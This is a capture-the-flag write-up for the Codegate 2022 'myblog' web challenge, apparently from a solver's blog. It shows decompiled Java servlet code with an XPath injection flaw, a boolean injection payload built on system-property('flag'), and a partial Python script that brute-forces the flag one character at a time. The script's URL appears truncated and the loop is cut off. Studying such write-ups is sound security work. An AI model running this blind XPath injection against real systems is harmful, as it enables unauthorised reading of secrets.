
Author: jkr

Tags: web

Points: 884 (19 solves)


I made a blog. Please check the security.

myblog is a simple blog that allows registering a user as well as reading and writing blog posts that have a title and content. The complete application logic is in blogServlet.class. After decompilation we see the request routing and user/session handling. The only function that is standing out to be exploitable is doReadArticle() that gets called when viewing a blog post.

  private String[] doReadArticle(HttpServletRequest req) {
    String id = (String)req.getSession().getAttribute("id");
    String idx = req.getParameter("idx");
    if ("null".equals(id) || idx == null)
      return null; 
    File userArticle = new File(this.tmpDir + "/article/", id + ".xml");
    try {
      InputSource is = new InputSource(new FileInputStream(userArticle));
      Document document = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(is);
      XPath xpath = XPathFactory.newInstance().newXPath();
      String title = (String)xpath.evaluate("//article[@idx='" + idx + "']/title/text()", document, XPathConstants.STRING);
      String content = (String)xpath.evaluate("//article[@idx='" + idx + "']/content/text()", document, XPathConstants.STRING);
      title = decBase64(title.trim());
      content = decBase64(content.trim());
      return new String[] { title, content };
    } catch (Exception e) {
      return null;

As idx parameter is unfiltered and this parameter goes straight into an XPath evaluation we can inject into XPath. Given the flag being placed in of tomcat means that the flag will be available as a system property called flag. Lucky enough XPath allows to access a system property using fn:system-property() as documented in the XSL function spec.

We can use the XPath injection to have an oracle (true/false) using an injected XPath. After creating a blog post containing the word MARKER in title and content we use following script to brute the flag content using the true/false oracle of the injection 1' and starts-with(system-property('flag'),'FLAGHERE') or ':

import requests, string
headers = {"Cookie":"JSESSIONID=42442D352EBC41CE4FE07B8C0B72820C"}
chars = "abcdef0123456789}{"

url = ',%27{0}%27)%20or%20%27'
p = 'codegate2022{'
while True:
    print p
    for x in chars:
        r = requests.get(url.format(p+x), headers=headers, allow_redirects=False)
        if "MARKER" in r.text:
            p += x